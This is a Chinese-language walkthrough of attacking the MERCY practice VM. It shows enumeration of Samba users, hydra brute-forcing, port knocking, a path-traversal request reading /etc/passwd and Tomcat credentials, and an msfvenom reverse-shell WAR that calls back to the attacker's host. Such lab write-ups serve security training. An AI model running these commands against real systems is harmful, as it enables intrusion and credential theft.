MERCY靶机
仅供个人娱乐
靶机信息
下载地址:https://drive.google.com/uc?id=1YzsW1lCKjo_WEr6Pk511DXQBFyMMR14y&export=download
一、主机探测
![](https://upload-images.jianshu.io/upload_images/4664072-72eef6505e5f75b9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
二、信息收集
![](https://upload-images.jianshu.io/upload_images/4664072-22a00820380cbc99.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
22/tcp filtered ssh
53/tcpopendomain
80/tcp filtered http
110/tcpopenpop3?
139/tcpopennetbios-ssn Samba smbd3.X-4.X(workgroup:WORKGROUP)
143/tcpopenimap Dovecot imapd
445/tcpopennetbios-ssn Samba smbd4.3.11-Ubuntu(workgroup:WORKGROUP)
993/tcpopenssl/imap Dovecot imapd995/tcpopenssl/pop3s?
8080/tcpopenhttp Apache Tomcat/Coyote JSP engine1.1
![](https://upload-images.jianshu.io/upload_images/4664072-1add98215727180c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-1135a3ee23bae3e8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
8080tomcat页面,/manager/登录不了
![](https://upload-images.jianshu.io/upload_images/4664072-be9cd4b23f069164.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-21f0058a5dc94020.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-59590405b2a507ea.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-571f1969ac8eb670.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
三、漏洞查找和利用
1.Samba漏洞攻击
Samba服务查看用户名.
enum4linux -U 192.168.174.130
![](https://upload-images.jianshu.io/upload_images/4664072-519a76f3f081df99.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-2a3bf522b80364a6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
用户名为:qiu 或者 pleadformercy
尝试远程挂载
mkdir /mnt/file
mount -tcifs 192.168.174.130:/qiu /mnt/file
![](https://upload-images.jianshu.io/upload_images/4664072-dd96ef8a271f7db8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
hydra -L 1.txt -P 2.txt smb://192.168.174.130 -s 139
![](https://upload-images.jianshu.io/upload_images/4664072-9ef5d1f1112661c7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
登录账户信息
smbclient //192.168.174.130/qiu -U qiu
![](https://upload-images.jianshu.io/upload_images/4664072-ebc1a77d336a4752.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-2135d092a6b287bc.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-bcbd2b3e837e2434.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
端口启动守护进程的防火墙端口开放的命令配置.
#!/bin/bash
for PORT in 159 27391 4;do nmap -Pn 192.168.174.130 -p $PORT;
done
#!/bin/bash
for PORT in 17301 28504 9999;do nmap -Pn 192.168.174.130 -p $PORT;
done
![](https://upload-images.jianshu.io/upload_images/4664072-c2635c058b63596b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-a54aba8f13d65feb.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
打开80端口
![](https://upload-images.jianshu.io/upload_images/4664072-c09e977d3a2c7ffa.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-528044d7d91dfefa.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-ad7c922b7bcc0596.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-fa30c979a30f9b06.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-8521643f4c7cbfa7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-2dee2367f5b28383.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-96a0b397a38647c0.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-126f5bade49c0fad.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-5aafbff02964aa97.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
其PoC为:
http://192.168.174.130/nomercy//windows/code.php?file=../../../../../../etc/passwd
![](https://upload-images.jianshu.io/upload_images/4664072-463d2eff58182145.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
8080端口中 ,apache的配置信息在/etc/tomcat7/tomcat-users.xml
http://192.168.174.130/nomercy//windows/code.php?file=../../../../../../etc/tomcat7/tomcat-users.xml
![](https://upload-images.jianshu.io/upload_images/4664072-0b304484d2d6399f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
获取账户密码
<? <user username="thisisasuperduperlonguser" password="heartbreakisinevitable" roles="admin-gui,manager-gui"/><? <user username="fluffy" password="freakishfluffybunny" roles="none"/>
![](https://upload-images.jianshu.io/upload_images/4664072-c1217f284c911c2a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
msfvenom来生成反弹war包
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.174.128 LPORT=4444 -f war -o shell1.war
![](https://upload-images.jianshu.io/upload_images/4664072-3ab2d450bf3dce70.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-f524c238eb330001.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
通过7z命令查看war包的内容
7z l shell1.war
![](https://upload-images.jianshu.io/upload_images/4664072-6bf05394b54908b6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
生成的是wviikccgyjggh.jsp
访问http://192.168.174.130:8080/shell1/wviikccgyjggh.jsp
![](https://upload-images.jianshu.io/upload_images/4664072-ecc3b64a2be7095a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
python -c 'import pty;pty.spawn("/bin/bash")'
信息收集
![](https://upload-images.jianshu.io/upload_images/4664072-d788753bdf57c527.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
切换账户登录
<? <user username="fluffy" password="freakishfluffybunny" roles="none"/>
![](https://upload-images.jianshu.io/upload_images/4664072-9c195ce47cbabd42.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)